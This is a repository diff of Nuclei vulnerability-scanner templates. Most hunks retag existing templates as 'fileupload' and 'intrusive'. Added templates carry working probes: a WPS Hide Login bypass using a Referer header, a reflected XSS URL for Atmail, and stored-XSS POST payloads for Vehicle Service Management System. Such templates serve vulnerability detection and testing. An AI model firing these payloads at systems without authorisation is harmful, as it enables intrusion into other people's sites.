STRLCPY/scan4all

■ ■ ■ ■ ■ ■

config/nuclei-templates/cnvd/2021/CNVD-2021-49104.yaml

		skipped 12 lines
13	13		cvss-score: 9.9
14	14		cwe-id: CWE-434
15	15		remediation: Pan Wei has released an update to resolve this vulnerability.
16		-	tags: pan,micro,cnvd,cnvd2021
	16	+	tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive
17	17
18	18		requests:
19	19		- raw:
		skipped 30 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2016/CVE-2016-3088.yaml

		skipped 14 lines
15	15		cvss-score: 9.8
16	16		cve-id: CVE-2016-3088
17	17		cwe-id: CWE-20
18		-	tags: fileupload,kev,edb,cve,cve2016,apache,activemq
	18	+	tags: fileupload,kev,edb,cve,cve2016,apache,activemq,intrusive
19	19
20	20		requests:
21	21		- raw:
		skipped 21 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2017/CVE-2017-12615.yaml

		skipped 18 lines
19	19		cwe-id: CWE-434
20	20		metadata:
21	21		shodan-query: title:"Apache Tomcat"
22		-	tags: rce,tomcat,kev,cisa,vulhub,cve,cve2017,apache
	22	+	tags: rce,tomcat,kev,cisa,vulhub,cve,cve2017,apache,fileupload
23	23
24	24		requests:
25	25		- method: PUT
		skipped 37 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2017/CVE-2017-15715.yaml

		skipped 14 lines
15	15		cvss-score: 8.1
16	16		cve-id: CVE-2017-15715
17	17		cwe-id: CWE-20
18		-	tags: apache,httpd,fileupload,vulhub,cve,cve2017
	18	+	tags: apache,httpd,fileupload,vulhub,cve,cve2017,intrusive
19	19
20	20		requests:
21	21		- raw:
		skipped 30 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2017/CVE-2017-6090.yaml

		skipped 15 lines
16	16		cwe-id: CWE-434
17	17		metadata:
18	18		shodan-query: http.title:"PhpCollab"
19		-	tags: cve2017,phpcollab,rce,fileupload,edb,cve
	19	+	tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive
20	20
21	21		requests:
22	22		- raw:
		skipped 30 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2018/CVE-2018-15961.yaml

		skipped 16 lines
17	17		cwe-id: CWE-434
18	18		metadata:
19	19		shodan-query: http.component:"Adobe ColdFusion"
20		-	tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev
	20	+	tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive
21	21
22	22		requests:
23	23		- raw:
		skipped 49 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2018/CVE-2018-20526.yaml

		skipped 18 lines
19	19		metadata:
20	20		google-dork: intitle:"Roxy file manager"
21	21		verified: "true"
22		-	tags: cve,cve2018,roxy,fileman,rce,upload,intrusive,packetstorm,edb
	22	+	tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb
23	23
24	24		requests:
25	25		- raw:
		skipped 56 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2019/CVE-2019-20183.yaml

		skipped 14 lines
15	15		cvss-score: 7.2
16	16		cve-id: CVE-2019-20183
17	17		cwe-id: CWE-434
18		-	tags: upload,edb,cve,cve2019,rce,intrusive
	18	+	tags: edb,cve,cve2019,rce,intrusive,fileupload
19	19
20	20		requests:
21	21		- raw:
		skipped 38 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2020/CVE-2020-12800.yaml

		skipped 15 lines
16	16		cvss-score: 9.8
17	17		cve-id: CVE-2020-12800
18	18		cwe-id: CWE-434
19		-	tags: wordpress,wp-plugin,fileupload,wp,rce,packetstorm,cve,cve2020
	19	+	tags: wordpress,wp-plugin,fileupload,wp,rce,packetstorm,cve,cve2020,intrusive
20	20
21	21		requests:
22	22		- raw:
		skipped 46 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2020/CVE-2020-17518.yaml

		skipped 16 lines
17	17		cvss-score: 7.5
18	18		cve-id: CVE-2020-17518
19	19		cwe-id: CWE-22
20		-	tags: lfi,flink,upload,vulhub,cve,cve2020,apache
	20	+	tags: lfi,flink,fileupload,vulhub,cve,cve2020,apache,intrusive
	21	+
21	22
22	23		requests:
23	24		- raw:
		skipped 23 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2020/CVE-2020-23972.yaml

		skipped 16 lines
17	17		cvss-score: 7.5
18	18		cve-id: CVE-2020-23972
19	19		cwe-id: CWE-434
20		-	tags: cve,cve2020,joomla,edb,packetstorm
	20	+	tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive
21	21
22	22		requests:
23	23		- raw:
		skipped 37 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2020/CVE-2020-24186.yaml

		skipped 14 lines
15	15		cvss-score: 10
16	16		cve-id: CVE-2020-24186
17	17		cwe-id: CWE-434
18		-	tags: rce,upload,packetstorm,cve,cve2020,wordpress,wp-plugin
	18	+	tags: rce,fileupload,packetstorm,cve,cve2020,wordpress,wp-plugin,intrusive
19	19
20	20		requests:
21	21		- raw:
		skipped 69 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2020/CVE-2020-25213.yaml

		skipped 16 lines
17	17		cvss-score: 9.8
18	18		cve-id: CVE-2020-25213
19	19		cwe-id: CWE-434
20		-	tags: cve,cve2020,wordpress,rce,kev
	20	+	tags: cve,cve2020,wordpress,rce,kev,fileupload,intrusive
21	21
22	22		requests:
23	23		- raw:
		skipped 48 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2020/CVE-2020-28871.yaml

		skipped 13 lines
14	14		cvss-score: 9.8
15	15		cve-id: CVE-2020-28871
16	16		cwe-id: CWE-434
17		-	tags: cve2020,monitorr,rce,oast,unauth,edb,cve
	17	+	tags: cve2020,monitorr,rce,oast,unauth,edb,cve,fileupload,intrusive
18	18
19	19		requests:
20	20		- raw:
		skipped 32 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2020/CVE-2020-35489.yaml

		skipped 14 lines
15	15		cvss-score: 10
16	16		cve-id: CVE-2020-35489
17	17		cwe-id: CWE-434
18		-	tags: cve,cve2020,wordpress,wp-plugin,rce,upload
	18	+	tags: cve,cve2020,wordpress,wp-plugin,rce,upload,intrusive
19	19
20	20		requests:
21	21		- method: GET
		skipped 35 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-21978.yaml

		skipped 17 lines
18	18		cvss-score: 9.8
19	19		cve-id: CVE-2021-21978
20	20		cwe-id: CWE-434
21		-	tags: cve,cve2021,vmware,rce,packetstorm
	21	+	tags: cve,cve2021,vmware,rce,packetstorm,fileupload,intrusive
22	22
23	23		requests:
24	24		- raw:
		skipped 31 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-22005.yaml

		skipped 14 lines
15	15		cvss-score: 9.8
16	16		cve-id: CVE-2021-22005
17	17		cwe-id: CWE-434
18		-	tags: cve,cve2021,vmware,vcenter,upload,kev
	18	+	tags: cve,cve2021,vmware,vcenter,fileupload,kev,intrusive
19	19
20	20		requests:
21	21		- raw:
		skipped 23 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-24236.yaml

		skipped 15 lines
16	16		cvss-score: 9.8
17	17		cve-id: CVE-2021-24236
18	18		cwe-id: CWE-434
19		-	tags: cve,rce,wp,unauth,imagements,wpscan,cve2021,upload,wordpress,wp-plugin
	19	+	tags: cve,rce,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive
	20	+
20	21
21	22		variables:
22	23		php: "{{to_lower('{{randstr}}')}}.php"
		skipped 64 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-24917.yaml

1	+	id: CVE-2021-24917
2	+
3	+	info:
4	+	name: WPS Hide Login < 1.9.1 - Protection Bypass with Referer-Header
5	+	author: akincibor
6	+	severity: high
7	+	description: The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.
8	+	reference:
9	+	- https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375
10	+	- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24917
11	+	- https://nvd.nist.gov/vuln/detail/CVE-2021-24917
12	+	remediation: Fixed in version 1.9.1
13	+	classification:
14	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
15	+	cvss-score: 7.5
16	+	cve-id: CVE-2021-24917
17	+	cwe-id: CWE-863
18	+	metadata:
19	+	verified: "true"
20	+	tags: cve2021,wp,wordpress,wp-plugin,unauth,wpscan,cve
21	+
22	+	requests:
23	+	- raw:
24	+	- \|
25	+	GET /wp-admin/options.php HTTP/1.1
26	+	Host: {{Hostname}}
27	+	Referer: something
28	+
29	+	matchers-condition: and
30	+	matchers:
31	+	- type: word
32	+	part: header
33	+	words:
34	+	- 'redirect_to=%2Fwp-admin%2Fsomething&reauth=1'
35	+
36	+	- type: dsl
37	+	dsl:
38	+	- "!contains(tolower(location), 'wp-login.php')"
39	+
40	+	extractors:
41	+	- type: kval
42	+	kval:
43	+	- location
44	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-3378.yaml

		skipped 15 lines
16	16		cvss-score: 9.8
17	17		cve-id: CVE-2021-3378
18	18		cwe-id: CWE-434
19		-	tags: fortilogger,fortigate,fortinet,packetstorm,cve,cve2021
	19	+	tags: fortilogger,fortigate,fortinet,packetstorm,cve,cve2021,fileupload,intrusive
20	20
21	21		requests:
22	22		- raw:
		skipped 40 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-40870.yaml

		skipped 13 lines
14	14		cvss-score: 9.8
15	15		cve-id: CVE-2021-40870
16	16		cwe-id: CWE-434
17		-	tags: cve,cve2021,rce,aviatrix,kev
	17	+	tags: cve,cve2021,rce,aviatrix,kev,fileupload,intrusive
18	18
19	19		requests:
20	20		- raw:
		skipped 27 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-43574.yaml

1	+	id: CVE-2021-43574
2	+
3	+	info:
4	+	name: Atmail Hosting Webserver 6.5.0 - Cross-site scripting
5	+	author: arafatansari,ritikchaddha
6	+	severity: medium
7	+	description: \|
8	+	Cross-site scripting (XSS) vulnerability in sites using outdated Atmail hosting version 6.5.0 allows remote attackers to inject arbitrary web script or HTML via the “format” parameter
9	+	reference:
10	+	- https://medium.com/@bhattronit96/cve-2021-43574-696041dcab9e
11	+	- https://nvd.nist.gov/vuln/detail/CVE-2021-43574
12	+	- https://help.atmail.com/hc/en-us/sections/115003283988
13	+	classification:
14	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
15	+	cvss-score: 6.1
16	+	cve-id: CVE-2021-43574
17	+	cwe-id: CWE-79
18	+	metadata:
19	+	shodan-query: http.html:"Powered by Atmail"
20	+	verified: "true"
21	+	tags: cve,cve2021,atmail,xss
22	+
23	+	requests:
24	+	- method: GET
25	+	path:
26	+	- "{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
27	+	- "{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
28	+	- "{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
29	+
30	+	stop-at-first-match: true
31	+	matchers-condition: and
32	+	matchers:
33	+	- type: word
34	+	part: body
35	+	words:
36	+	- '<script>alert(document.domain)</script>" does not exist'
37	+
38	+	- type: word
39	+	part: header
40	+	words:
41	+	- text/html
42	+
43	+	- type: status
44	+	status:
45	+	- 500
46	+	- 403
47	+	condition: or
48	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-46068.yaml

1	+	id: CVE-2021-46068
2	+
3	+	info:
4	+	name: Vehicle Service Management System - Stored Cross Site Scripting
5	+	author: TenBird
6	+	severity: medium
7	+	description: \|
8	+	A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.
9	+	reference:
10	+	- https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS
11	+	- https://www.plsanu.com/vehicle-service-management-system-myaccount-stored-cross-site-scripting-xss
12	+	- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
13	+	- https://nvd.nist.gov/vuln/detail/CVE-2021-46068
14	+	classification:
15	+	cve-id: CVE-2021-46068
16	+	metadata:
17	+	verified: true
18	+	tags: cve,cve2021,xss,vms,authenticated
19	+
20	+	requests:
21	+	- raw:
22	+	- \|
23	+	POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
24	+	Host: {{Hostname}}
25	+	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
26	+
27	+	username={{username}}&password={{password}}
28	+
29	+	- \|
30	+	POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
31	+	Host: {{Hostname}}
32	+	Content-Type: application/x-www-form-urlencoded
33	+
34	+	id=1&firstname=Adminstrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin
35	+
36	+	- \|
37	+	GET /vehicle_service/admin/?page=user HTTP/1.1
38	+	Host: {{Hostname}}
39	+
40	+	req-condition: true
41	+	redirects: true
42	+	max-redirects: 2
43	+	cookie-reuse: true
44	+	matchers-condition: and
45	+	matchers:
46	+	- type: dsl
47	+	dsl:
48	+	- "contains(all_headers_3, 'text/html')"
49	+	- "status_code_3 == 200"
50	+	- 'contains(body_3, "Adminstrator\"><script>alert(document.domain)</script> Admin")'
51	+	condition: and
52	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-46069.yaml

1	+	id: CVE-2021-46069
2	+
3	+	info:
4	+	name: Vehicle Service Management System - Stored Cross Site Scripting
5	+	author: TenBird
6	+	severity: medium
7	+	description: \|
8	+	A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.
9	+	reference:
10	+	- https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS
11	+	- https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss
12	+	- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
13	+	- https://nvd.nist.gov/vuln/detail/CVE-2021-46069
14	+	classification:
15	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
16	+	cvss-score: 4.8
17	+	cve-id: CVE-2021-46069
18	+	cwe-id: CWE-79
19	+	metadata:
20	+	verified: "true"
21	+	tags: cve,cve2021,xss,vms,authenticated
22	+	requests:
23	+	- raw:
24	+	- \|
25	+	POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
26	+	Host: {{Hostname}}
27	+	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
28	+
29	+	username={{username}}&password={{password}}
30	+
31	+	- \|
32	+	POST /vehicle_service/classes/Master.php?f=save_mechanic HTTP/1.1
33	+	Host: {{Hostname}}
34	+	Content-Type: application/x-www-form-urlencoded
35	+
36	+	id=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&[email protected]&status=1
37	+
38	+	- \|
39	+	GET /vehicle_service/admin/?page=mechanics HTTP/1.1
40	+	Host: {{Hostname}}
41	+
42	+	req-condition: true
43	+	redirects: true
44	+	max-redirects: 2
45	+	cookie-reuse: true
46	+	matchers-condition: and
47	+	matchers:
48	+	- type: dsl
49	+	dsl:
50	+	- "contains(all_headers_3, 'text/html')"
51	+	- "status_code_3 == 200"
52	+	- 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
53	+	condition: and
54	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-46071.yaml

1	+	id: CVE-2021-46071
2	+
3	+	info:
4	+	name: Vehicle Service Management System - Stored Cross Site Scripting
5	+	author: TenBird
6	+	severity: medium
7	+	description: \|
8	+	A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel.
9	+	reference:
10	+	- https://github.com/plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS
11	+	- https://www.plsanu.com/vehicle-service-management-system-category-list-stored-cross-site-scripting-xss
12	+	- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
13	+	- https://nvd.nist.gov/vuln/detail/CVE-2021-46071
14	+	classification:
15	+	cve-id: CVE-2021-46071
16	+	metadata:
17	+	verified: true
18	+	tags: cve,cve2021,xss,vms,authenticated
19	+
20	+	requests:
21	+	- raw:
22	+	- \|
23	+	POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
24	+	Host: {{Hostname}}
25	+	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
26	+
27	+	username={{username}}&password={{password}}
28	+
29	+	- \|
30	+	POST /vehicle_service/classes/Master.php?f=save_category HTTP/1.1
31	+	Host: {{Hostname}}
32	+	Content-Type: application/x-www-form-urlencoded
33	+
34	+	id=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1
35	+
36	+	- \|
37	+	GET /vehicle_service/admin/?page=maintenance/category HTTP/1.1
38	+	Host: {{Hostname}}
39	+
40	+	req-condition: true
41	+	redirects: true
42	+	max-redirects: 2
43	+	cookie-reuse: true
44	+	matchers-condition: and
45	+	matchers:
46	+	- type: dsl
47	+	dsl:
48	+	- "contains(all_headers_3, 'text/html')"
49	+	- "status_code_3 == 200"
50	+	- 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
51	+	condition: and
52	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-46072.yaml

1	+	id: CVE-2021-46072
2	+
3	+	info:
4	+	name: Vehicle Service Management System - Stored Cross Site Scripting
5	+	author: TenBird
6	+	severity: medium
7	+	description: \|
8	+	A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel.
9	+	reference:
10	+	- https://github.com/plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS
11	+	- https://www.plsanu.com/vehicle-service-management-system-service-list-stored-cross-site-scripting-xss
12	+	- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
13	+	- https://nvd.nist.gov/vuln/detail/CVE-2021-46072
14	+	classification:
15	+	cve-id: CVE-2021-46072
16	+	metadata:
17	+	verified: true
18	+	tags: cve,cve2021,xss,vms,authenticated
19	+
20	+	requests:
21	+	- raw:
22	+	- \|
23	+	POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
24	+	Host: {{Hostname}}
25	+	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
26	+
27	+	username={{username}}&password={{password}}
28	+
29	+	- \|
30	+	POST /vehicle_service/classes/Master.php?f=save_service HTTP/1.1
31	+	Host: {{Hostname}}
32	+	Content-Type: application/x-www-form-urlencoded
33	+
34	+	id=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1
35	+
36	+	- \|
37	+	GET /vehicle_service/admin/?page=maintenance/services HTTP/1.1
38	+	Host: {{Hostname}}
39	+
40	+	req-condition: true
41	+	redirects: true
42	+	max-redirects: 2
43	+	cookie-reuse: true
44	+	matchers-condition: and
45	+	matchers:
46	+	- type: dsl
47	+	dsl:
48	+	- "contains(all_headers_3, 'text/html')"
49	+	- "status_code_3 == 200"
50	+	- 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
51	+	condition: and
52	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-0595.yaml

		skipped 12 lines
13	13		cvss-score: 5.4
14	14		cve-id: CVE-2022-0595
15	15		cwe-id: CWE-79
16		-	tags: cve,cve2022,xss,wordpress,wp-plugin,wpscan
	16	+	tags: cve,cve2022,xss,wordpress,wp-plugin,wpscan,fileupload,intrusive
17	17
18	18		requests:
19	19		- raw:
		skipped 36 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-0963.yaml

		skipped 17 lines
18	18		cwe-id: CWE-79
19	19		metadata:
20	20		verified: "true"
21		-	tags: xss,microweber,cms,authenticated,huntr,cve,cve2022
	21	+	tags: xss,microweber,cms,authenticated,huntr,cve,cve2022,intrusive
22	22
23	23		requests:
24	24		- raw:
		skipped 46 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-26352.yaml

		skipped 14 lines
15	15		cvss-score: 9.8
16	16		cve-id: CVE-2022-26352
17	17		cwe-id: CWE-22,CWE-434
18		-	tags: packetstorm,cve,cve2022,rce,dotcms,kev
	18	+	tags: packetstorm,cve,cve2022,rce,dotcms,kev,fileupload,intrusive
19	19
20	20		requests:
21	21		- raw:
		skipped 28 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposed-panels/mfiles-web-detect.yaml

1	+	id: mfiles-web-detect
2	+
3	+	info:
4	+	name: M-Files Web Panel Detect
5	+	author: Nodauf
6	+	severity: info
7	+	reference:
8	+	- https://www.m-files.com/about/trust-center/security-advisories/
9	+	metadata:
10	+	verified: true
11	+	shodan-query: http.html:"M-Files Web"
12	+	tags: panel,m-files
13	+
14	+	requests:
15	+	- method: GET
16	+	path:
17	+	- "{{BaseURL}}"
18	+	- "{{BaseURL}}/Login.aspx"
19	+
20	+	stop-at-first-match: true
21	+	matchers-condition: or
22	+	matchers:
23	+	- type: regex
24	+	part: body
25	+	regex:
26	+	- '<title>(.)M-Files Web(.)</title>'
27	+
28	+	- type: word
29	+	part: body
30	+	words:
31	+	- 'M-Files user'
32	+	- 'M-Files authentication'
33	+	condition: or
34	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposed-panels/osticket/osticket-install.yaml

1	+	id: osticket-install
2	+
3	+	info:
4	+	name: OSTicket Installation
5	+	author: ritikchaddha
6	+	severity: high
7	+	metadata:
8	+	verified: true
9	+	shodan-query: http.title:"osTicket Installer"
10	+	tags: panel,osticket,install
11	+
12	+	requests:
13	+	- method: GET
14	+	path:
15	+	- "{{BaseURL}}/upload/setup/install.php"
16	+	- "{{BaseURL}}/setup/install.php"
17	+
18	+	stop-at-first-match: true
19	+	matchers-condition: and
20	+	matchers:
21	+	- type: word
22	+	part: body
23	+	words:
24	+	- '<title>osTicket Installer'
25	+
26	+	- type: word
27	+	part: body
28	+	words:
29	+	- 'already installed'
30	+	negative: true
31	+
32	+	- type: status
33	+	status:
34	+	- 200
35	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposed-panels/osticket-panel.yaml

1	+	id: osticket-panel
2	+
3	+	info:
4	+	name: OSTicket Panel Detect
5	+	author: ritikchaddha
6	+	severity: info
7	+	metadata:
8	+	verified: true
9	+	shodan-query: http.html:"powered by osTicket"
10	+	tags: panel,osticket
11	+
12	+	requests:
13	+	- method: GET
14	+	path:
15	+	- "{{BaseURL}}"
16	+	- "{{BaseURL}}/login.php"
17	+
18	+	stop-at-first-match: true
19	+	redirects: true
20	+	max-redirects: 2
21	+	matchers-condition: and
22	+	matchers:
23	+	- type: word
24	+	part: body
25	+	words:
26	+	- 'powered by osTicket'
27	+	- 'content="osTicket'
28	+	condition: or
29	+
30	+	- type: status
31	+	status:
32	+	- 200
33	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/misconfiguration/aem/aem-debugging-libraries.yaml

1	+	id: aem-debugging-libraries
2	+
3	+	info:
4	+	name: Adobe AEM Debugging Client Libraries
5	+	author: dhiyaneshDk
6	+	severity: info
7	+	reference:
8	+	- https://aem4beginner.blogspot.com/debugging-client-libraries
9	+	- https://adobe-consulting-services.github.io/acs-aem-tools/features/dumplibs/index.html
10	+	metadata:
11	+	verified: true
12	+	shodan-query:
13	+	- http.title:"AEM Sign In"
14	+	- http.component:"Adobe Experience Manager"
15	+	tags: misconfig,aem,adobe
16	+
17	+	requests:
18	+	- method: GET
19	+	path:
20	+	- "{{BaseURL}}/libs/cq/ui/content/dumplibs.html"
21	+	- "{{BaseURL}}/libs/granite/ui/content/dumplibs.validate.html"
22	+	- "{{BaseURL}}/libs/granite/ui/content/dumplibs.rebuild.html"
23	+	- "{{BaseURL}}/libs/granite/ui/content/dumplibs.test.html"
24	+	- "{{BaseURL}}/libs/granite/ui/content/dumplibs.html"
25	+
26	+	stop-at-first-match: true
27	+	matchers:
28	+	- type: word
29	+	part: body
30	+	words:
31	+	- '<title>Client Libraries</title>'
32	+	- '<title>Rebuild Client Libraries</title>'
33	+	- '<title>Client Libraries Test Output</title>'
34	+	condition: or
35	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/misconfiguration/cx-cloud-upload-detect.yaml

		skipped 3 lines
4	4		name: CX Cloud Unauthenticated Upload Detect
5	5		author: dhiyaneshDk
6	6		severity: info
7		-	tags: upload
	7	+	tags: fileupload
8	8
9	9		requests:
10	10		- method: GET
		skipped 8 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/misconfiguration/roxyfileman-fileupload.yaml

		skipped 10 lines
11	11		metadata:
12	12		verified: "true"
13	13		google-dork: intitle:"Roxy file manager"
14		-	tags: intrusive,misconfig,edb,roxy,fileman,rce,upload
	14	+	tags: intrusive,misconfig,edb,roxy,fileman,rce,fileupload
15	15
16	16		requests:
17	17		- raw:
		skipped 66 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/misconfiguration/unauthenticated-popup-upload.yaml

		skipped 5 lines
6	6		severity: info
7	7		reference:
8	8		- https://www.exploit-db.com/ghdb/6671
9		-	tags: edb,fileupload,upload
	9	+	tags: edb,fileupload
10	10
11	11		requests:
12	12		- method: GET
		skipped 14 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/other/cisco-rv-series-rce.yaml

		skipped 19 lines
20	20		metadata:
21	21		shodan-query: http.html:"Cisco rv340"
22	22		verified: "true"
23		-	tags: auth-bypass,injection,packetstorm,cve,cve2021,cisco,rce
	23	+	tags: auth-bypass,injection,packetstorm,cve,cve2021,cisco,rce,intrusive
24	24
25	25		requests:
26	26		- raw:
		skipped 46 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/other/core-chuangtian-cloud-rce.yaml

		skipped 10 lines
11	11		cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
12	12		cvss-score: 10.0
13	13		cwe-id: CWE-77
14		-	tags: rce
	14	+	tags: rce,fileupload,intrusive
15	15
16	16		requests:
17	17		- raw:
		skipped 29 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/other/dixell-xweb500-filewrite.yaml

		skipped 9 lines
10	10		- https://nvd.nist.gov/vuln/detail/CVE-2021-45420
11	11		metadata:
12	12		google-dork: inurl:"xweb500.cgi"
13		-	tags: lfw,iot,dixell,xweb500,edb
	13	+	tags: lfw,iot,dixell,xweb500,edb,fileupload,intrusive
14	14
15	15		requests:
16	16		- raw:
		skipped 25 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/other/powercreator-cms-rce.yaml

		skipped 11 lines
12	12		cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
13	13		cvss-score: 10.0
14	14		cwe-id: CWE-77
15		-	tags: rce,powercreator,intrusive
	15	+	tags: rce,powercreator,intrusive,fileupload
16	16
17	17		requests:
18	18		- raw:
		skipped 33 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/seeyon/zhiyuan-file-upload.yaml

		skipped 7 lines
8	8		reference:
9	9		- https://www.programmersought.com/article/92658169875/
10	10		remediation: Apply the appropriate patch.
11		-	tags: zhiyuan,rce,upload,seeyon
	11	+	tags: zhiyuan,rce,fileupload,seeyon,intrusive
12	12
13	13		requests:
14	14		- method: GET
		skipped 20 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/weaver/oa-v9-uploads-file.yaml

		skipped 6 lines
7	7		description: A vulnerability in OA V9 uploadOperation.jsp endpoint allows remote attackers to upload arbitrary files to the server. These files can be subsequently called and are executed by the remote software.
8	8		reference:
9	9		- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
10		-	tags: rce,jsp
	10	+	tags: rce,jsp,fileupload,intrusive
11	11
12	12		requests:
13	13		- raw:
		skipped 25 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml

		skipped 12 lines
13	13		cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
14	14		cvss-score: 9.8
15	15		cwe-id: CWE-434
16		-	tags: wp-plugin,rce,upload,unauth,wpscan,msf,wordpress,ait-csv,wp
	16	+	tags: wp-plugin,rce,fileupload,unauth,wpscan,msf,wordpress,ait-csv,wp,intrusive
17	17
18	18		requests:
19	19		- raw:
		skipped 31 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml

		skipped 11 lines
12	12		cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
13	13		cvss-score: 10.0
14	14		cwe-id: CWE-77
15		-	tags: wpscan,wordpress,wp-plugin,rce,intrusive,upload,python
